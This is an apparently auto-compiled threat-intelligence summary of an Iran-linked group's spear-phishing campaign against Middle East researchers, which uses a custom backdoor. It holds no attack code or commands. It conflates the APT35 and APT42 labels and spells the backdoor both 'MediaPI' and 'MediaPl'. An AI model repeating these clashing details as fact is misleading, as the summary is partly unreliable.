Iran-linked threat actors [1] [5] [6] [7] [8], known as Mint Sandstorm [3] [5] [6] [9], APT35 [1] [3] [5] [6] [7] [9], or Charming Kitten [3] [5] [6] [7] [9], have been conducting a sophisticated social engineering campaign targeting high-profile researchers involved in the Israel-Hamas conflict [5] [6]. This subgroup of APT35 [7], also known as Charming Kitten or Phosphorus [7], has launched a phishing campaign since November 2023.
Description
These threat actors are using customized phishing lures and a new custom backdoor called MediaPI to trick targets into downloading malicious files and steal sensitive data. The attackers use custom-made emails that often bypass email security services [7], aiming to socially engineer targets into downloading malicious files [2] [7] [9]. In some cases, the attackers have employed a new [7], custom backdoor called MediaPl [1] [3] [4] [6] [7]. This ongoing campaign focuses on experts who have the potential to influence intelligence and policies related to Iran’s interests [5] [6], particularly regarding Palestine and Israel [7]. The targets primarily consist of individuals working at universities and research organizations in Belgium [5], France [2] [5] [6] [9], Gaza [2] [3] [5] [6] [9], Israel [2] [3] [5] [6] [7] [9], the UK [2] [3] [5] [6] [9], and the US [2] [3] [5] [6] [9].
Mint Sandstorm [1] [2] [3] [4] [5] [6] [7] [8] [9], also known as APT42 [1] [9], operates as a state-sponsored actor and targets governments [1], NGOs [1], private entities [1], and academia for espionage [1]. They have been observed using compromised accounts to send phishing lures and continuously improve their tools to evade detection [1]. The deployment of the custom backdoor MediaPI indicates an evolution in their cyber espionage capabilities [1].
The motivation behind Mint Sandstorm’s activities appears to be espionage and intelligence gathering aligned with Iran’s geopolitical interests [1], rather than direct financial gain [1]. Security teams should be aware of potential dangers such as cross-sector infiltration [1], intellectual property theft and espionage [1] [4], erosion of trust in digital communications [1], and the expansion of cyber conflict [1].
Conclusion
Mint Sandstorm [1] [2] [3] [4] [5] [6] [7] [8] [9], an Iran-linked threat actor associated with Iran’s IRGC [8], has been actively targeting high-profile individuals at universities and research organizations since November 2023 [8]. They employ custom phishing techniques to deploy the MediaPl backdoor and have recently been using strategies such as phishing with hacked email accounts [8], utilizing curl commands to connect to their server [8], and deploying the MediaPl backdoor [8]. Mint Sandstorm impersonates well-known figures and tailors their phishing lures to gain the trust of their targets before delivering malicious content [8]. Microsoft has detected various files and backdoors used by Mint Sandstorm [8], including .vbs scripts and renamed versions of NirCmd [8]. Their remote access capabilities pose a significant threat to system confidentiality [8], prompting Microsoft to enhance detection measures to defend against Mint Sandstorm [8].
References
[1] https://www.scmagazine.com/news/iranian-threat-group-mint-sandstorm-targets-high-profile-middle-east-researchers
[2] https://thehackernews.com/2024/01/iranian-hackers-masquerades-as.html
[3] https://virtualattacks.com/researchers-and-universities-are-the-target-of-mint-sandstorm-apt/
[4] https://www.secureworld.io/industry-news/iranian-hackers-espionage-campaigns
[5] https://www.infosecurity-magazine.com/news/iranian-phishing-israel-hamas/
[6] https://ciso2ciso.com/iranian-phishing-campaign-targets-israel-hamas-war-experts-source-www-infosecurity-magazine-com/
[7] https://www.techradar.com/pro/security/microsoft-warns-of-new-spearphishing-attack-targeting-workers-at-top-companies
[8] https://cybersecuritynews.com/mint-sandstorm-attacking-researchers/
[9] https://vulners.com/thn/THN:EEAC55672CC55BB646CF4D79C6F45B59
